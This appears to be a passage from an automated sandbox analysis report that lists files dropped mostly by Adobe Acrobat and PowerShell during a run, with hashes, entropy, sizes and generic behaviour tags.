6:YEQXJ2HXaVWP8z14vB3/dVlPIHAR0YCqoAvJfYdPeUkwRe9:YvXKXavzKvR/ZwHAOZGg8Ukee9
|
Size: |
289
|
Whitelisted: |
false
|
Reputation: |
timeout
|
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner
|
JSON data
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner
|
Category: |
dropped
|
Dump: |
DC_Reader_RHP_Banner.5.dr
|
ID: |
dr_5
|
Target ID: |
5
|
Process: |
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
|
Type: |
JSON data
|
Entropy: |
5.276710630571702
|
Encrypted: |
false
|
Ssdeep: |
6:YEQXJ2HXaVWP8z14vB3/dVlPIHAR0YCqoAvJf+dPeUkwRe9:YvXKXavzKvR/ZwHAOZG28Ukee9
|
Size: |
284
|
Whitelisted: |
false
|
Reputation: |
timeout
|
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
|
JSON data
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
|
Category: |
dropped
|
Dump: |
DC_Reader_RHP_Intent_Banner.5.dr
|
ID: |
dr_12
|
Target ID: |
5
|
Process: |
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
|
Type: |
JSON data
|
Entropy: |
5.274432022762068
|
Encrypted: |
false
|
Ssdeep: |
6:YEQXJ2HXaVWP8z14vB3/dVlPIHAR0YCqoAvJfbPtdPeUkwRe9:YvXKXavzKvR/ZwHAOZGDV8Ukee9
|
Size: |
291
|
Whitelisted: |
false
|
Reputation: |
timeout
|
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
|
JSON data
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
|
Category: |
dropped
|
Dump: |
DC_Reader_RHP_Retention.5.dr
|
ID: |
dr_6
|
Target ID: |
5
|
Process: |
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
|
Type: |
JSON data
|
Entropy: |
5.273643798218384
|
Encrypted: |
false
|
Ssdeep: |
6:YEQXJ2HXaVWP8z14vB3/dVlPIHAR0YCqoAvJf21rPeUkwRe9:YvXKXavzKvR/ZwHAOZG+16Ukee9
|
Size: |
287
|
Whitelisted: |
false
|
Reputation: |
timeout
|
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
|
JSON data
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
|
Category: |
dropped
|
Dump: |
DC_Reader_Sign_LHP_Banner.5.dr
|
ID: |
dr_29
|
Target ID: |
5
|
Process: |
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
|
Type: |
JSON data
|
Entropy: |
5.6669617300510655
|
Encrypted: |
false
|
Ssdeep: |
24:Yv6XabKJhjamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BS1:YvBKJhTBgkDMUJUAh8cvM1
|
Size: |
1090
|
Whitelisted: |
false
|
Reputation: |
timeout
|
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
|
JSON data
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
|
Category: |
dropped
|
Dump: |
DC_Reader_Upsell_Cards.5.dr
|
ID: |
dr_9
|
Target ID: |
5
|
Process: |
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
|
Type: |
JSON data
|
Entropy: |
5.2499150266380985
|
Encrypted: |
false
|
Ssdeep: |
6:YEQXJ2HXaVWP8z14vB3/dVlPIHAR0YCqoAvJfshHHrPeUkwRe9:YvXKXavzKvR/ZwHAOZGUUUkee9
|
Size: |
286
|
Whitelisted: |
false
|
Reputation: |
timeout
|
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020
|
JSON data
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020
|
Category: |
dropped
|
Dump: |
Edit_InApp_Aug2020.5.dr
|
ID: |
dr_7
|
Target ID: |
5
|
Process: |
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
|
Type: |
JSON data
|
Entropy: |
5.27389748687245
|
Encrypted: |
false
|
Ssdeep: |
6:YEQXJ2HXaVWP8z14vB3/dVlPIHAR0YCqoAvJTqgFCrPeUkwRe9:YvXKXavzKvR/ZwHAOZGTq16Ukee9
|
Size: |
282
|
Whitelisted: |
false
|
Reputation: |
timeout
|
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING
|
data
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING
|
Category: |
dropped
|
Dump: |
TESTING.5.dr
|
ID: |
dr_20
|
Target ID: |
5
|
Process: |
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
|
Type: |
data
|
Entropy: |
0.8112781244591328
|
Encrypted: |
false
|
Ssdeep: |
3:e:e
|
Size: |
4
|
Whitelisted: |
true
|
Reputation: |
timeout
|
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json
|
JSON data
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json
|
Category: |
dropped
|
Dump: |
SOPHIA.json.5.dr
|
ID: |
dr_15
|
Target ID: |
5
|
Process: |
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
|
Type: |
JSON data
|
Entropy: |
5.144514633571514
|
Encrypted: |
false
|
Ssdeep: |
24:YjE5lm/a4fBayen6K3/Jv1GymP/8+NjPjj0S/Agj2v2LSxCL7q8QPZ2xm85M699U:YKxnp/J0ymn8MPvseq7m7q8QPZ0+699U
|
Size: |
2814
|
Whitelisted: |
false
|
Reputation: |
timeout
|
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents
|
SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8,
version-valid-for 25
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents
|
Category: |
dropped
|
Dump: |
SharedDataEvents.5.dr
|
ID: |
dr_19
|
Target ID: |
5
|
Process: |
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
|
Type: |
SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8,
version-valid-for 25
|
Entropy: |
1.3196258482785053
|
Encrypted: |
false
|
Ssdeep: |
48:TGufl2GL7ms9WR1CPmPbPahuCeypilIoC4:lNVms9WfMwbPahxe44
|
Size: |
12288
|
Whitelisted: |
false
|
Reputation: |
timeout
|
Signature Hits |
Behavior Group |
Mitre Attack |
|
Creates files inside the user directory |
System Summary |
|
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal
|
SQLite Rollback Journal
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal
|
Category: |
dropped
|
Dump: |
SharedDataEvents-journal.5.dr
|
ID: |
dr_18
|
Target ID: |
5
|
Process: |
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
|
Type: |
SQLite Rollback Journal
|
Entropy: |
1.7792104846296901
|
Encrypted: |
false
|
Ssdeep: |
48:7MVWR1CPmPbPahuCHypilIgqFl2GL7mse:7MWfMwbPahxHJKVmse
|
Size: |
8720
|
Whitelisted: |
false
|
Reputation: |
timeout
|
Signature Hits |
Behavior Group |
Mitre Attack |
|
Creates files inside the user directory |
System Summary |
|
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin
|
data
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin
|
Category: |
dropped
|
Dump: |
UserCache64.bin.5.dr
|
ID: |
dr_23
|
Target ID: |
5
|
Process: |
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
|
Type: |
data
|
Entropy: |
5.392739213842091
|
Encrypted: |
false
|
Ssdeep: |
768:RNOpblrU6TBH44ADKZEgnQnb3Q+b/1DeYjC+Qji1BKbac9Yyu:6a6TZ44ADEnQnb3JbdqaKb39K
|
Size: |
66726
|
Whitelisted: |
false
|
Reputation: |
timeout
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
Category: |
dropped
|
Dump: |
StartupProfileData-NonInteractive.4.dr
|
ID: |
dr_3
|
Target ID: |
4
|
Process: |
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Type: |
data
|
Entropy: |
1.1940658735648508
|
Encrypted: |
false
|
Ssdeep: |
3:NlllulnmWllZ:NllUmWl
|
Size: |
64
|
Whitelisted: |
false
|
Reputation: |
timeout
|
|
C:\Users\user\AppData\Local\Temp\MSI26d80.LOG
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\Local\Temp\MSI26d80.LOG
|
Category: |
dropped
|
Dump: |
MSI26d80.LOG.5.dr
|
ID: |
dr_10
|
Target ID: |
5
|
Process: |
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
|
Type: |
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
Entropy: |
3.488809521505088
|
Encrypted: |
false
|
Ssdeep: |
6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K88Cl4:Qw946cPbiOxDlbYnuRKdl
|
Size: |
246
|
Whitelisted: |
false
|
Reputation: |
timeout
|
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bau2ic1w.lsv.ps1
|
ASCII text, with no line terminators
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bau2ic1w.lsv.ps1
|
Category: |
dropped
|
Dump: |
__PSScriptPolicyTest_bau2ic1w.lsv.ps1.4.dr
|
ID: |
dr_0
|
Target ID: |
4
|
Process: |
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Type: |
ASCII text, with no line terminators
|
Entropy: |
4.038920595031593
|
Encrypted: |
false
|
Ssdeep: |
3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
|
Size: |
60
|
Whitelisted: |
false
|
Reputation: |
timeout
|
Signature Hits |
Behavior Group |
Mitre Attack |
|
Creates temporary files |
System Summary |
|
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kfvqxs35.ti4.psm1
|
ASCII text, with no line terminators
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kfvqxs35.ti4.psm1
|
Category: |
dropped
|
Dump: |
__PSScriptPolicyTest_kfvqxs35.ti4.psm1.4.dr
|
ID: |
dr_1
|
Target ID: |
4
|
Process: |
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Type: |
ASCII text, with no line terminators
|
Entropy: |
4.038920595031593
|
Encrypted: |
false
|
Ssdeep: |
3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
|
Size: |
60
|
Whitelisted: |
false
|
Reputation: |
timeout
|
|
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-11 00-20-08-613.log
|
ASCII text, with very long lines (393)
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-11 00-20-08-613.log
|
Category: |
dropped
|
Dump: |
NGLClient_AcrobatReader123.6.20320.6 2025-01-11 00-20-08-613.log.5.dr
|
ID: |
dr_17
|
Target ID: |
5
|
Process: |
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
|
Type: |
ASCII text, with very long lines (393)
|
Entropy: |
5.33860678500249
|
Encrypted: |
false
|
Ssdeep: |
384:IC2heaVGJMUPhP80d0Wc+9eG/CCihFomva7RVRkfKhZmWWyC7rjgNgXo6ge5iaW0:X8B
|
Size: |
16525
|
Whitelisted: |
false
|
Reputation: |
timeout
|
|
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
|
ASCII text, with very long lines (393), with CRLF line terminators
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
|
Category: |
dropped
|
Dump: |
NGLClient_AcrobatReader123.6.20320.6.log.5.dr
|
ID: |
dr_14
|
Target ID: |
5
|
Process: |
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
|
Type: |
ASCII text, with very long lines (393), with CRLF line terminators
|
Entropy: |
5.3585016293895364
|
Encrypted: |
false
|
Ssdeep: |
384:aEuZG4HXEv+kdej8XcsByEDKWRQjf2KUQ7F5/jfNInHV/y74eDsku/ubqdLi67Dt:+3o
|
Size: |
15114
|
Whitelisted: |
false
|
Reputation: |
timeout
|
|
C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt
|
Category: |
dropped
|
Dump: |
acroNGLLog.txt.5.dr
|
ID: |
dr_16
|
Target ID: |
5
|
Process: |
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
|
Type: |
ASCII text, with CRLF line terminators
|
Entropy: |
5.399126608706253
|
Encrypted: |
false
|
Ssdeep: |
192:TcbeIewcbVcbqI4ucbrcbQIrJcb6cbCIC4cbOcbcIy8cbx:ceo4+rsCDyD
|
Size: |
29752
|
Whitelisted: |
false
|
Reputation: |
timeout
|
|
C:\Users\user\AppData\Local\Temp\acrocef_low\20ad2ce3-81ea-4adb-966e-e93fa25f5162.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\Local\Temp\acrocef_low\20ad2ce3-81ea-4adb-966e-e93fa25f5162.tmp
|
Category: |
dropped
|
Dump: |
20ad2ce3-81ea-4adb-966e-e93fa25f5162.tmp.8.dr
|
ID: |
dr_36
|
Target ID: |
8
|
Process: |
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
|
Type: |
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
|
Entropy: |
7.97605879016224
|
Encrypted: |
false
|
Ssdeep: |
24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLrGZkwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLrGZx
|
Size: |
1407294
|
Whitelisted: |
false
|
Reputation: |
timeout
|
|
C:\Users\user\AppData\Local\Temp\acrocef_low\343b5dac-c6fe-4369-bbfa-cea00177a89e.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\Local\Temp\acrocef_low\343b5dac-c6fe-4369-bbfa-cea00177a89e.tmp
|
Category: |
dropped
|
Dump: |
343b5dac-c6fe-4369-bbfa-cea00177a89e.tmp.8.dr
|
ID: |
dr_38
|
Target ID: |
8
|
Process: |
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
|
Type: |
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
|
Entropy: |
7.9736851559892425
|
Encrypted: |
false
|
Ssdeep: |
6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
|
Size: |
386528
|
Whitelisted: |
false
|
Reputation: |
timeout
|
|
C:\Users\user\AppData\Local\Temp\acrocef_low\3fdaeb30-1cdd-4a3f-be45-3fe9125f4733.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\Local\Temp\acrocef_low\3fdaeb30-1cdd-4a3f-be45-3fe9125f4733.tmp
|
Category: |
dropped
|
Dump: |
3fdaeb30-1cdd-4a3f-be45-3fe9125f4733.tmp.8.dr
|
ID: |
dr_41
|
Target ID: |
8
|
Process: |
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
|
Type: |
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
|
Entropy: |
7.976496077007677
|
Encrypted: |
false
|
Ssdeep: |
24576:/xA7owWLkwYIGNPMGZfPdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLkwZGuGZn3mlind9i4ufFXpAXkru
|
Size: |
1419751
|
Whitelisted: |
false
|
Reputation: |
timeout
|
|
C:\Users\user\AppData\Local\Temp\acrocef_low\edd67467-a04b-4dfc-a97e-ed8ec6fd7075.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
|
dropped
|
|
|
|
File: |
C:\Users\user\AppData\Local\Temp\acrocef_low\edd67467-a04b-4dfc-a97e-ed8ec6fd7075.tmp
|
Category: |
dropped
|
Dump: |
edd67467-a04b-4dfc-a97e-ed8ec6fd7075.tmp.8.dr
|
ID: |
dr_37
|
Target ID: |
8
|
Process: |
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
|
Type: |
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
|
Entropy: |
7.98639316555857
|
Encrypted: |
false
|
Ssdeep: |
12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
|
Size: |
758601
|
Whitelisted: |
false
|
Reputation: |
timeout
|
|
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
|
|
|
File: |
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
Category: |
dropped
|
Dump: |
Download-1.tmp.9.dr
|
ID: |
dr_52
|
Target ID: |
9
|
Process: |
C:\Windows\System32\svchost.exe
|
Type: |
JSON data
|
Entropy: |
4.306461250274409
|
Encrypted: |
false
|
Ssdeep: |
3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
|
Size: |
55
|
Whitelisted: |
false
|
Reputation: |
timeout
|
Signature Hits |
Behavior Group |
Mitre Attack |
|
Creates files inside the system directory |
System Summary |
|
|